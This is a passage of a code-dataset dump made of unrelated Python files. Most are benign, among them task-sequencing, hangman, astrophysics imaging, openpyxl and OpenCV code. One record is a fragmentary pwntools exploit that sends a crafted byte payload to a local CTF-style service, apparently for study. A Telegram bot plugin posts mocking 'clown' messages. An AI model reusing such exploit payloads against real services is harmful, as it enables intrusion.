stop_result\n        self._continue_result = continue_result\n        self._preempt_requested = False\n\n    def try_immediate(self, userdata=None):\n        if userdata is None:\n            userdata = smach.UserData()\n\n        # With lock\n        with self._lock:\n            assert(self._runstate == Task.IDLE)\n            assert(self._active_task_idx is None)\n\n            (result, self._active_task_idx) = self._loop(self._initial_task_idx, userdata)\n\n            if result == Task.DEFERRED:\n                self._runstate = Task.READY\n            else:\n                assert(self._active_task_idx is None)\n                self._runstate = Task.IDLE\n\n        return result\n\n    def execute_deferred(self, parent_cb, userdata=None):\n        if userdata is None:\n            userdata = smach.UserData()\n\n        with self._lock:\n            assert(self._runstate == Task.READY)\n            self._runstate = Task.EXECUTING\n            self._parent_cb = parent_cb\n            self._execute_deferred_child(self._active_task_idx, self._make_cb(self._active_task_idx), userdata)\n\n    def cancel(self):\n        with self._lock:\n            assert(self._runstate == Task.READY)\n            assert(self._active_task_idx is not None)\n            self._tasks[self._active_task_idx].cancel()\n            self._runstate = Task.IDLE\n            self._active_task_idx = None\n\n    def preempt(self):\n        # With lock\n        with self._lock:\n            # States we can be in when lock is taken/released:\n            # Task.IDLE && _active_task_idx is None\n            # Task.READY && _active_task_idx is not None\n            # Task.EXECUTING && _active_task_idx is not None\n\n            if self._runstate == Task.READY:\n                assert(self._active_task_idx is not None)\n                self.cancel()\n                # preemption complete\n            elif self._runstate == Task.EXECUTING:\n                assert(self._active_task_idx is not None)\n                self._tasks[self._active_task_idx].preempt()\n                self._preempt_requested = True\n                # preemption deferred until callback\n            else:\n                assert(self._runstate == Task.IDLE)\n                assert(self._active_task_idx is None)\n                # preemption complete\n\n    # Returns (result, final_idx)\n    def _loop(self, initial_idx, userdata):\n        # self._lock should be locked by calling function.\n        # We will stop as soon as any task returns DEFERRED\n
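        # (note) A DEFERRED result propagates to the caller, which must then\n        # drive the child via execute_deferred(); _task_termination_cb resumes\n        # this loop once the deferred child finishes.\n        # Caller should then call execute_deferred() on that 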
task\n idx = initial_idx\n while idx < len(self._tasks):\n # If self._active_task_idx is not None and initial_idx <= self._active_task_idx,\n # then this _loop call is coming from the timer thread and has reached the active task.\n if idx == self._active_task_idx:\n return (None, idx)\n \n result = self._try_immediate_child(idx, userdata)\n \n if result == Task.DEFERRED:\n return (Task.DEFERRED, idx)\n \n if result == self._continue_result:\n idx += 1\n continue\n \n if result == self._stop_result:\n return (self._stop_result, None)\n \n return (self._continue_result, None)\n\n def _make_cb(self, idx):\n def cb(result, userdata):\n self._task_termination_cb(result, idx, userdata)\n return cb\n\n def _task_termination_cb(self, result, task_idx, userdata):\n cb = None\n # With lock\n with self._lock:\n assert(result != Task.DEFERRED)\n assert(0 <= task_idx and task_idx < len(self._tasks))\n # _active_task_idx might not be the same as the task_idx of the task\n # that just completed, if we were preempted by a timer callback in\n # PreemptingSequenceTask.\n \n cb = self._parent_cb\n \n if self._preempt_requested:\n self._runstate = Task.IDLE\n self._active_task_idx = None\n self._preempt_requested = False\n result = Task.ABORTED\n else:\n if result == self._continue_result:\n (result, self._active_task_idx) = self._loop(self._active_task_idx + 1, userdata)\n\n if result == Task.DEFERRED:\n self._execute_deferred_child(self._active_task_idx, self._make_cb(self._active_task_idx), userdata)\n else:\n self._runstate = Task.IDLE\n self._active_task_idx = None\n \n # Without lock\n if result != Task.DEFERRED:\n cb(result, userdata)\n \n def _add_active_tasks_recursive(self, label_for_task, active_tasks):\n with self._lock:\n if self._active_task_idx is not None:\n active_task = self._tasks[self._active_task_idx]\n active_tasks.append(label_for_task[active_task])\n active_task._add_active_tasks_recursive(label_for_task, active_tasks)\n ","sub_path":"src/smach_bt/sequential.py","file_name":"sequential.py","file_ext":"py","file_size_in_byte":5673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"470352258","text":"def hangman():\r\n import random\r\n \r\n word_list = ['word', 'letter', 'number', 'person', 'pen', 'class',\r\n 'people', 'sound', 'water', 'side', 'place', 'man', 'men',\r\n 'woman', 'women', 'boy', 'girl', 'year', 'day', 'week', 'month',\r\n 'name', 'sentence', 'line', 'air', 'land', 'home', 'hand', 'house',\r\n 'picture', 'animal', 'mother', 'father', 'brother', 'sister', 'world',\r\n 'head', 'page', 'country', 'question', 'answer', 'school', 'plant', 'food',\r\n 'sun', 'state', 'eye', 'city', 'tree', 'farm', 'story', 'sea', 'night', 'day',\r\n 'life', 'north', 'south', 'east', 'west', 'child', 'children', 'example', 'paper',\r\n 'music', 'river', 'car', 'foot', 'feet', 'book', 'science', 'room', 'friend', 'idea',\r\n 'fish', 'mountain', 'horse', 'watch', 'color', 'face', 'wood', 'list', 'bird', 'body',\r\n 'dog', 'family', 'song', 'door', 'product', 'wind', 'ship', 'area', 'rock', 'order', 'fire',\r\n 'problem', 'piece', 'top', 'bottom', 'king', 'space']\r\n\r\n stages = ['',\r\n '-------- ',\r\n '| | ',\r\n '| | ',\r\n '| 0 ',\r\n '| /|) ',\r\n '| // ',\r\n '| '\r\n ]\r\n\r\n print ('Welcom to Hangman')\r\n\r\n while True:\r\n word = random.choice(word_list)\r\n wrong = 0\r\n rletters = list(word)\r\n board = ['__']*len(word)\r\n \r\n while True:\r\n if '__' not in board:\r\n print(f'\\nYou win! 
It was: {word}')\r\n                break\r\n            print('\\n')\r\n            char = input('Guess a letter: ')\r\n            if char in rletters:\r\n                cind = rletters.index(char)\r\n                board[cind] = char\r\n                rletters[cind] = '$'\r\n                print(' '.join(board))\r\n            elif char == 'hint':\r\n                i = board.index('__')\r\n                char = rletters[i]\r\n                board[i] = char\r\n                rletters[i] = '$'\r\n                print(' '.join(board))\r\n            else:\r\n                wrong += 1\r\n                print(' '.join(board))\r\n                print('\\n'.join(stages[:wrong+1]))\r\n                if wrong == len(stages) - 1:\r\n                    print(f'You lose! It was: {word}')\r\n                    break\r\n\r\n        if input('again? (y/n):') == 'n':\r\n            break\r\n\r\nhangman()\r\n","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"107457234","text":"import discord\nimport utils\nfrom libs import imgp\n\n\nasync def run(client, message, args, prefix, db):\n    if len(args) == 0:\n        user_dc = message.author\n    else:\n        user_dc = utils.get_user(message.guild, args[0])\n        if not user_dc: raise Exception(f\"Üye '{args[0]}' bulunamadı\")\n\n    await imgp.profil_yap(user_dc, db[user_dc], db)\n\n    await message.channel.send(file=discord.File(f\"data/profile.png\"))\n","sub_path":"commands/profil.py","file_name":"profil.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"118432060","text":"# -*- coding:utf-8 -*-\n# The coding declaration above only states the file encoding; string literals are still unicode,\n# and in Python 3 you can call str.encode(\"<encoding>\") directly.\n# Transcoding steps: start from a unicode str, then convert onward. In Python 3, encode()\n# turns the str into bytes, and to display it as text again you must decode() with the matching encoding.\n\n\ns = \"你好\"  # still a unicode str\n# s_to_unicode = s.decode('utf-8')  # a str has no decode()\ns_to_gbk = s.encode(\"gbk\")\n\nprint(s_to_gbk)\ngbk_to_unicode = s_to_gbk.decode(\"gbk\").encode(\"utf-8\").decode(\"utf-8\")\n# Why does it take encode(\"utf-8\").decode(\"utf-8\") to display the Chinese text?\n# Here everything is first converted to bytes, then back to str.\nprint(gbk_to_unicode)","sub_path":"day3/encode_decode_unicode_utf-8.py","file_name":"encode_decode_unicode_utf-8.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"650901933","text":"# -*- coding: utf-8 -*-\n\"\"\"\nFresco creates a \"simulated observation\" of a set of particles.\nParticles can be \"stars\" (point sources emitting light) or \"gas\" (emitting,\nreflecting and/or obscuring light).
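The main entry point is make_image(), which maps stars and/or gas onto a\nsynthetic image frame.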
Gas may also be displayed with contour\nlines.\n\"\"\"\n\nfrom __future__ import (\n    print_function,\n    division,\n    absolute_import,\n)\n\nimport numpy as np\n\nfrom scipy.ndimage import gaussian_filter\n\nfrom amuse.units import units, constants, nbody_system\nfrom amuse.datamodel import Particles\nfrom amuse.io import read_set_from_file\nfrom amuse.datamodel.rotation import rotate\n\nimport matplotlib.pyplot as plt\n\nfrom amuse.ext.fresco.ubvi import rgb_frame\nfrom amuse.ext.fresco.fieldstars import new_field_stars\n\n\ndef evolve_to_age(stars, age, stellar_evolution=\"SeBa\"):\n    \"Evolve stars to specified age with specified code\"\n    if stellar_evolution == \"SeBa\":\n        from amuse.community.seba.interface import SeBa\n        stellar_evolution = SeBa()\n    elif stellar_evolution == \"SSE\":\n        from amuse.community.sse.interface import SSE\n        stellar_evolution = SSE()\n        # SSE can result in nan values for luminosity/radius\n    else:\n        # raising a bare string is a TypeError in Python 3; raise an exception\n        raise ValueError(\n            \"No such stellar evolution code %s or no code specified\"\n            % stellar_evolution\n        )\n    stellar_evolution.particles.add_particles(stars)\n    if age > 0 | units.yr:\n        stellar_evolution.evolve_model(age)\n    stars.luminosity = np.nan_to_num(\n        stellar_evolution.particles.luminosity.value_in(units.LSun)\n    ) | units.LSun\n\n    stars.radius = stellar_evolution.particles.radius\n    # prevent zero/nan radius.\n    x = np.where(\n        np.nan_to_num(\n            stars.radius.value_in(units.RSun)\n        ) == 0.\n    )\n    stars[x].radius = 0.01 | units.RSun\n\n    stellar_evolution.stop()\n    return\n\n\ndef calculate_effective_temperature(luminosity, radius):\n    temp = np.nan_to_num(\n        (\n            (\n                luminosity\n                / (\n                    constants.four_pi_stefan_boltzmann\n                    * radius**2\n                )\n            )**.25\n        ).value_in(units.K)\n    ) | units.K\n    return temp\n\n\ndef make_image(\n    stars=None,\n    gas=None,\n    converter=None,\n    image_width=[\n        10. | units.parsec,\n        10. | units.parsec,\n    ],\n    image_size=[1024, 1024],\n    percentile=0.9995,\n    age=0. | units.Myr,\n    sourcebands=\"ubvri\",\n    vmax=None,\n    calc_temperature=True,\n    mapper_code=None,  # \"FiMap\"\n    zoom_factor=1.0,\n    psf_type=\"hubble\",\n    psf_sigma=1.0,\n    extinction=False,\n    return_vmax=False,\n):\n    \"\"\"\n    Makes an image from gas and stars\n    \"\"\"\n    mode = []\n    if gas is not None:\n        mode.append(\"gas\")\n    if stars is not None:\n        mode.append(\"stars\")\n    if mode == []:\n        return\n\n    if extinction:\n        # Extinction can currently only be handled with FiMap\n        mapper_code = \"FiMap\"\n\n    if mapper_code == \"FiMap\":\n        def mapper():\n            from amuse.community.fi.interface import FiMap\n            mapper = FiMap(converter, mode=\"openmp\")\n\n            # mapper.parameters.minimum_distance = 1. 
| units.AU\n mapper.parameters.image_size = image_size\n # mapper.parameters.image_target = image_target\n\n mapper.parameters.image_width = image_width\n # mapper.parameters.projection_direction = (\n # (image_target-viewpoint)\n # / (image_target-viewpoint).length()\n # )\n # mapper.parameters.projection_mode = projection\n # mapper.parameters.image_angle = horizontal_angle\n # mapper.parameters.viewpoint = viewpoint\n mapper.parameters.extinction_flag = extinction\n return mapper\n else:\n # Gridify as default\n mapper = None\n mapper_code = \"gridify\"\n\n if \"stars\" not in mode:\n image = column_density_map(\n gas,\n image_width=image_width,\n image_size=image_size,\n mapper_factory=mapper,\n mapper_code=mapper_code,\n zoom_factor=zoom_factor,\n psf_type=psf_type,\n psf_sigma=psf_sigma,\n return_vmax=return_vmax,\n )\n else:\n image = image_from_stars(\n stars,\n image_width=image_width,\n image_size=image_size,\n percentile=percentile,\n calc_temperature=calc_temperature,\n age=age,\n sourcebands=sourcebands,\n gas=gas,\n vmax=vmax,\n mapper_factory=mapper,\n mapper_code=mapper_code,\n zoom_factor=zoom_factor,\n psf_type=psf_type,\n psf_sigma=psf_sigma,\n return_vmax=return_vmax,\n )\n return image\n\n\ndef column_density_map(\n gas,\n image_width=10. | units.parsec,\n image_size=[1024, 1024],\n mapper_factory=None,\n mapper_code=None,\n zoom_factor=1.0,\n psf_type=\"gaussian\",\n psf_sigma=10.0,\n return_vmax=False,\n):\n if mapper_code == \"FiMap\":\n if callable(mapper_factory):\n mapper = mapper_factory()\n\n p = mapper.particles.add_particles(gas)\n p.weight = gas.mass.value_in(units.amu)\n projected = mapper.image.pixel_value\n mapper.stop()\n im = gaussian_filter(\n projected,\n sigma=psf_sigma * zoom_factor,\n order=0,\n )\n else:\n from amuse.ext.fresco.gridify import map_to_grid\n gas_in_mapper = gas.copy()\n gas_in_mapper.weight = gas_in_mapper.mass.value_in(units.amu)\n raw_image = map_to_grid(\n gas_in_mapper.x,\n gas_in_mapper.y,\n weights=gas_in_mapper.weight,\n image_size=image_size,\n image_width=image_width,\n )\n im = gaussian_filter(\n raw_image,\n sigma=psf_sigma * zoom_factor,\n order=0,\n ).T\n if return_vmax:\n return (im, -1)\n return im\n\n\ndef image_from_stars(\n stars,\n image_width=10. | units.parsec,\n image_size=[1024, 1024],\n percentile=0.9995,\n calc_temperature=True,\n age=0. 
| units.Myr,\n    sourcebands=\"ubvri\",\n    gas=None,\n    vmax=None,\n    mapper_factory=None,\n    mapper_code=None,\n    zoom_factor=1.0,\n    psf_type=\"hubble\",\n    psf_sigma=1.0,\n    return_vmax=False,\n):\n    if calc_temperature:\n        # calculates the temperature of the stars from their total luminosity\n        # and radius, calculates those first if needed\n        stars.temperature = calculate_effective_temperature(\n            stars.luminosity,\n            stars.radius,\n        )\n\n    vmax, rgb = rgb_frame(\n        stars,\n        dryrun=False,\n        image_width=image_width,\n        vmax=vmax,\n        multi_psf=False,  # True,\n        image_size=image_size,\n        percentile=percentile,\n        sourcebands=sourcebands,\n        mapper_factory=mapper_factory,\n        gas=gas,\n        mapper_code=mapper_code,\n        zoom_factor=zoom_factor,\n        psf_type=psf_type,\n        psf_sigma=psf_sigma,\n    )\n    if return_vmax:\n        return rgb['pixels'], vmax\n    return rgb['pixels']\n\n\ndef initialise_image(\n    fig=None,\n    dpi=150,\n    image_size=[2048, 2048],\n    length_unit=units.parsec,\n    image_width=5 | units.parsec,\n    plot_axes=True,\n    subplot=0,\n    x_offset=0 | units.parsec,\n    y_offset=0 | units.parsec,\n    z_offset=0 | units.parsec,\n):\n    if fig is None:\n        if plot_axes:\n            left = 0.2\n            bottom = 0.2\n        else:\n            left = 0.\n            bottom = 0.\n        right = 1.0\n        top = 1.0\n        figwidth = image_size[0] / dpi / (right - left)\n        figheight = image_size[1] / dpi / (top - bottom)\n        figsize = (figwidth, figheight)\n\n        xmin = x_offset.value_in(length_unit) - 0.5 * image_width.value_in(length_unit)\n        xmax = x_offset.value_in(length_unit) + 0.5 * image_width.value_in(length_unit)\n        ymin = y_offset.value_in(length_unit) - 0.5 * image_width.value_in(length_unit)\n        ymax = y_offset.value_in(length_unit) + 0.5 * image_width.value_in(length_unit)\n\n        fig, ax = plt.subplots(nrows=1, ncols=1, figsize=figsize, dpi=dpi)\n        fig.subplots_adjust(left=left, right=right, top=top, bottom=bottom)\n\n        ax.set_xlim([xmin, xmax])\n        ax.set_ylim([ymin, ymax])\n    else:\n        # Simply clear and re-use the old figure\n        ax = fig.get_axes()[subplot]\n        ax.cla()\n    ax.set_xlabel(\"X (%s)\" % (length_unit))\n    ax.set_ylabel(\"Y (%s)\" % (length_unit))\n    ax.set_aspect(1)\n    ax.spines['top'].set_visible(False)\n    ax.spines['right'].set_visible(False)\n    ax.spines['bottom'].set_visible(False)\n    ax.spines['left'].set_visible(False)\n    ax.set_facecolor('black')\n    return fig\n","sub_path":"src/amuse/ext/fresco/fresco.py","file_name":"fresco.py","file_ext":"py","file_size_in_byte":8960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"168589577","text":"# coding: utf-8\n\nimport openpyxl\n\nwbook = openpyxl.Workbook()\nsheet = wbook.create_sheet('sheet1', 0)  # create a worksheet (name, position)\nfor sheet in wbook:  # iterate over worksheets\n    print(sheet.title)\nprint(wbook.sheetnames)  # worksheet names\nsheet = wbook['Sheet']  # get a worksheet by name\nsheet2 = wbook.worksheets[0]  # get a worksheet by index\nsheet.title = 'new_sheet'  # rename the worksheet\nwbook.remove(wbook.worksheets[0])  # delete a worksheet\n\nprint(sheet.max_row, sheet.max_column)  # max row/column of the sheet\ntableHead = ['序号', '姓名', '身份证', '档次', '账号', '已交月份']\nfor i in tableHead:\n    sheet.cell(1, tableHead.index(i) + 1).value = i  # header row\nsheet.append([])  # append a blank row\nsheet.append(tableHead)  # append a data row\ndata = [[1,2,3],[4,5,6]]  # fill data row by row\nfor x in data:\n    sheet.append(x)\n\nsheet['A4'] = 4  # set cell A4 (row 4, column A) to 4\nsheet.cell(row=4, column=2, value=10)  # set the cell at row 4, column 2 to 10\nsheet.cell(4, 2, 10)  # same as above\ncell = sheet.cell(4,2)\ncell.value = 'hello, world'\nprint(sheet.cell(4,2).value)\n\n\n# Iterate over values\nfor row in sheet.values:\n    for value in row:\n        print(value)\nfor row in sheet.iter_rows(min_row=1, max_col=3, max_row=2):\n    for cell in row:\n        print(cell)\n\n
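# (added note) sheet.values yields plain tuples of cell values, while\n# iter_rows yields Cell objects; e.g. (illustrative, openpyxl >= 2.6)\n#   for row in sheet.iter_rows(min_row=1, max_row=2, values_only=True): ...\n# yields the values directly.\n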
# Get the cell's number format: 'General' for a general cell, a pattern like '0.00_ '\n# for numbers, '0%' for percentages\n# Numbers must be given a number format in Excel itself; values written directly are General\nprint(sheet[\"A4\"].number_format)\n# Formulas: this prints the formula text, not the computed value; the script cannot read the computed result\nsheet[\"A5\"] = \"=SUM(A1:A3)\"\nprint(sheet[\"A4\"].value)\n# Merged cells: running the unmerge step alone raises an error; re-run the merge first, then unmerge\nsheet.merge_cells('A2:D2')\nsheet.unmerge_cells('A2:D2')\n# Insert a row above row 7\nsheet.insert_rows(7)\n# Starting at column 6, delete 3 columns, i.e. columns 6, 7 and 8, as follows:\nsheet.delete_cols(6, 3)\n\n# Font style\nfrom openpyxl.styles import Font\nfont = Font(name='Calibri',\n            size=11,\n            color='FF000000',\n            bold=False,\n            italic=False,\n            vertAlign=None,\n            underline='none',\n            strike=False)\nsheet['A1'].font = font\n# Fill style\nfrom openpyxl.styles import PatternFill\n# fill_type is None or 'solid'\ncell.fill = PatternFill(fill_type=cell.fill.fill_type, fgColor=cell.fill.fgColor)\nfrom openpyxl.styles import Border, Side\n# Border style\nborder = Border(left=Side(border_style=None, color='FF000000'),\n                right=Side(border_style=None, color='FF000000'),\n                top=Side(border_style=None, color='FF000000'),\n                bottom=Side(border_style=None, color='FF000000'),\n                diagonal=Side(border_style=None, color='FF000000'),\n                diagonal_direction=0,\n                outline=Side(border_style=None, color='FF000000'),\n                vertical=Side(border_style=None, color='FF000000'),\n                horizontal=Side(border_style=None, color='FF000000')\n)\n# Alignment: horizontal may be distributed, justify, center, left, fill, centerContinuous, right, general\n# vertical may be bottom, distributed, justify, center, top\nfrom openpyxl.styles import Alignment\nalignment = Alignment(horizontal='general',\n                      vertical='bottom',\n                      text_rotation=0,\n                      wrap_text=False,\n                      shrink_to_fit=False,\n                      indent=0)\n# Apply a style to a whole row or column\n# A merged range can be addressed through its top-left cell.\ncol = sheet.column_dimensions['A']\ncol.font = Font(bold=True)\nrow = sheet.row_dimensions[1]\nrow.font = Font(underline=\"single\")\n\nwbook.save('../resource/OpenPyxlTest.xlsx')","sub_path":"jingle/test/OpenPyxlTest.py","file_name":"OpenPyxlTest.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"342408590","text":"#!/usr/bin/python\n\nfrom pwn import *\n\n\nconn = remote('localhost', 1337)\n\n# this builds a reliable chain of calls to func_b2\n# just to get us to a stable starting point\npayload = \"\\x80\\x90\\x14\\x90\\x14\\x90\\x14\\xf1\"\n# in function func_b2, count is 68, bufsize is 0x84\n# in function func_36, count is 67, bufsize is 0x94\n# in function func_b2, count is 66, bufsize is 0x84\n# in function func_b2, count is 65, bufsize is 0x84\n# in function func_b2, count is 64, bufsize is 0x84\n# in function func_b2, count is 63, bufsize is 0x84\n# in function func_13, count is 62, bufsize is 0x08\n\n# This has the net effect of xoring the local buffer\n# with 0x00, i.e. do nothing. 
+{"seq_id":"94399038","text":"\"\"\"Check if the userbot is alive. If you change these, you become the gayest gay such that even the gay world will disown you.\"\"\"\n#IMG CREDITS: @WhySooSerious\nimport asyncio\nfrom telethon import events\nfrom uniborg.util import admin_cmd\nfrom userbot import ALIVE_NAME\nfrom telethon.tl.types import ChannelParticipantsAdmins\nDEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else \"Unknown\"\nPM_IMG = \"https://telegra.ph/file/4161fabad95cc63d78a64.png\"\npm_caption = \"**🎊 Congratulations! 🎉**\\n\"\npm_caption += \"I had never read so much clowning in one sitting, so I decided to confer an award on you..\\n\\n\"\npm_caption += \"**YOU ARE OFFICIALLY A NEW CLOWN OF NAZLAND! 🤡**\"\n\n@borg.on(admin_cmd(\"nazclown\"))\nasync def friday(nazclown):\n    chat = await nazclown.get_chat()\n    \"\"\" For .alive command, check if the bot is running. \"\"\"\n    await borg.send_file(nazclown.chat_id, PM_IMG,caption=pm_caption)\n    await nazclown.delete()\n\n    \n@borg.on(admin_cmd(pattern=r\"nazclown\", allow_sudo=True))\nasync def friday(nazclown):\n    chat = await nazclown.get_chat()\n    \"\"\" For .alive command, check if the bot is running. \"\"\"\n    await borg.send_file(nazclown.chat_id, PM_IMG,caption=pm_caption)\n","sub_path":"userbot/plugins/nazclown.py","file_name":"nazclown.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"507642029","text":"from nfa import *\nfrom state import *\nfrom transition import *\n\nclass Base(object):\n\n\t#constructor: \tconstructs a new regx or character\n\t#argument:\tregx; possible expression\n\t#argument:\tchar; possible base character a, b or e\n\t#only one argument may be valid.\n\tdef __init__(self, regx, char):\n\t\tself.regx = regx\n\t\tself.char = char\n\n\t#recursively evaluate the regx or character into a single nfa\n\tdef eval(self):\n\t\tif (self.regx != None):\n\t\t\tbase_nfa = self.regx.eval()\n\t\tif (self.char != None):\n\t\t\tbase_start = State()\n\t\t\tbase_start.set_state(True, False)\n\n\t\t\tbase_final = State()\n\t\t\tbase_final.set_state(False, True)\n\t\n\t\t\tbase_transition = Transition(self.char, base_final)\n\t\n\t\t\tbase_start.add_transition(base_transition)\n\t\n\t\t\tbase_nfa = NFA(base_start, base_final)\n\t\n\t\treturn base_nfa\n","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
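Base.eval above is the single-character base case of Thompson's construction: one start state, one accepting state, one labelled transition. A sketch of how two such fragments could be concatenated with an epsilon transition (labelled 'e', per the constructor comment). It assumes the State and Transition classes behave as used above, and that NFA keeps its two constructor arguments reachable as .start and .final — an assumption, since that class lives in a module not shown here.

def concat(nfa1, nfa2):
    # Demote nfa1's accepting state and nfa2's start state to plain states,
    # then bridge them with an epsilon ('e') transition.
    nfa1.final.set_state(False, False)
    nfa2.start.set_state(False, False)
    nfa1.final.add_transition(Transition('e', nfa2.start))
    return NFA(nfa1.start, nfa2.final)

# 'a' followed by 'b':
ab_nfa = concat(Base(None, 'a').eval(), Base(None, 'b').eval())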
+{"seq_id":"126654369","text":"import cv2\nimport numpy as np\n\nframe_scale = 1.5\nycl = 27\nych = 662\nxcl = 68\nxch = 700\n\n# get xy from centroids\ndef getControl():\n    centroid_from_Picture()\n    #cen = centroid_from_Picture()\n    return xy_from_centroid(1)\n\n\noffset = 94.5\n\n\n# captures picture and processes centroids\ndef centroid_from_Picture():\n    cap = cv2.VideoCapture(0)\n    ret, frame = cap.read()\n    cap.release()\n    #frame = cv2.imread('picture.png')\n    frame = cv2.resize(frame, None, fx = frame_scale, fy = frame_scale )\n    frame = frame[ ycl:ych, xcl:xch ]\n    blur = cv2.GaussianBlur( frame, (5,5), 0 )\n\n    img = frame\n    hsv = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)\n    shapes = getShapes(frame, hsv)\n\n    # centroids = getCentroids(shapes, gray)\n    # centroids = getCentroids2(shapes,frame)\n    getCentroids2( shapes, frame )\n    # return centroids\n\n\n# should be tuples of (\n#   color (String),\n#   lower bound (array), upper bound (array) )\n#colors = [('red', np.array([177, 76, 92]), np.array([255, 255, 255])),\n#          ('blue', np.array([52, 58, 77]), np.array([130, 255, 255])),\n#          ('yellow', np.array([19, 57, 108]), np.array([87, 255, 255])),\n#          ('yellow', np.array([19, 57, 108]), np.array([87, 255, 255])),\n#          ('brown', np.array([150, 47, 43]), np.array([180, 143, 88])),\n#          ('black', np.array([52, 0, 0]), np.array([148, 74, 74]))]\ncolors = [('red', np.array([0, 187, 46]), np.array([179, 255, 132]) ),\n\t('blue', np.array([65, 69, 77]), np.array([142, 255, 255]) ),\n\t('yellow', np.array([0, 64, 146]), np.array([65, 255, 255]) ),\n\t('pink', np.array([159, 77, 113]), np.array([179, 212, 255]) ),\n\t('brown', np.array([16, 102, 42]), np.array([171, 255, 93]) ),\n\t('black', np.array([0, 0, 0]), np.array([179, 71, 67]) )]\n\n# creates color segmentation of the workspace.\ndef getShapes(image, h):\n    masks = []\n    for (c, l, u) in colors:\n        mask = cv2.inRange(h, l, u)\n        mod = morphologicalTrans(mask)\n        cv2.imshow('m',mask)\n        cv2.waitKey(1000)\n        cv2.imshow('mod',mod)\n        cv2.waitKey(1000)\n        masks.append(mod)\n\n    # # gets first shape from image\n    # shapes = cv2.bitwise_and(image, image, mask = masks[0])\n    #\n    # # get the remaining shapes and OR each into the current composite.\n    # for i in range(1, len(masks)):\n    #     sh = cv2.bitwise_and(image, image, mask = masks[i])\n    #     # shapes = cv2.bitwise_or(shapes, shapes, mask = sh)\n    #     shapes = cv2.add(shapes, sh)\n    #     cv2.imshow('cool',shapes)\n    #     cv2.waitKey(1000)\n    return masks\n\ndef getCentroids2(shapes,frame):\n    i = 0\n    c = spotCentroid( shapes[i] )\n    print(c)\n\nlower_thresh = 40\ndef spotCentroid( mask ):\n    thresh = mask\n    #ret, thresh = cv2.threshold( mask, lower_thresh, 240, 0 )\n    contours, hierarchy = cv2.findContours( thresh, 1, 2 )\n\n    M = [cv2.moments(contours[i]) for i in range(0, len(contours))]\n    cx = [(int(m['m10'] / m['m00'])) for m in M]\n    cy = [(int(m['m01'] / m['m00'])) for m in M]\n    cen = list(zip(cx, cy))\n\n    cv2.drawContours(mask, contours, -1, (255, 0, 0), 2)\n    lineThickness = 6\n    for i in range(0, len(cx)):\n        cv2.line(mask, (cx[i], cy[i]), (cx[i] + 1, cy[i] + 1), (120, 120, 0), lineThickness)\n\n    cv2.imshow(\"Cool\", mask)\n    cv2.waitKey(2000)\n    return cen\n\n# gets the centroid from segmentation\ndef getCentroids(shapes, g):\n    ret, thresh = cv2.threshold(g, lower_thresh, 240, 0)\n    contours, hierarchy = cv2.findContours(thresh, 1, 2)\n\n    M = [cv2.moments(contours[i]) for i in range(0, len(contours))]\n    cx = [(int(m['m10'] / m['m00'])) for m in M]\n    cy = [(int(m['m01'] / m['m00'])) for m in M]\n    cen = list(zip(cx, cy))\n    return cen\n\n\n# processes all centroids for publishing\ndef xy_from_centroid(centroid_points):\n    result = list(map(camera_transfer, centroid_points))\n    return result\n\n\n# converts a centroid point to a camera function\ndef camera_transfer(centroid_point):\n    return centroid_point\n\ndef morphologicalTrans(mask):\n    # kernel = np.ones((5, 5), np.uint8)\n    # kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3))\n    kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))\n    # dilation = cv2.dilate(mask, kernel, iterations=2)\n    # erosion = cv2.erode(dilation, kernel, iterations=5)\n\n    # opening = cv2.morphologyEx(mask, cv2.MORPH_GRADIENT, kernel)\n    opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel )\n    # closing = cv2.morphologyEx(mask, cv2.MORPH_GRADIENT, kernel)\n    return opening\n\nif __name__ == '__main__':\n    centroid_from_Picture()\n    # try:\n    #     Centroid()\n    # except rospy.ROSInterruptException:\n    #     pass\n","sub_path":"CVStackTest.py","file_name":"CVStackTest.py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"160712712","text":"from src.templating import Request, render_template\n\nlang = {\n    \"ru\": {\n        \"title\": \"Удалить сессию\",\n        \"route\": {\n            \"panel\": \"Панель управления\",\n            \"delete_session\": \"Удалить сессию\",\n        },\n    },\n}\n\n\nasync def response(request: Request) -> render_template:\n    request.session.clear()\n    return await render_template(\"route/panel/delete_session.html\", context={\n        \"lc\": lang[request.lang],\n    })\n","sub_path":"public/route/panel/delete_session.py","file_name":"delete_session.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"566157036","text":"from typing import List\r\n\r\nclass Solution:\r\n    def plusOne(self, digits: List[int]) -> List[int]:\r\n        number = 0\r\n        size = len(digits)-1\r\n        for i in range(len(digits)):\r\n            number += digits[i]*(10**size)\r\n            size -= 1\r\n        number += 1\r\n        output = []\r\n        output = list(map(int,str(number)))\r\n        return 
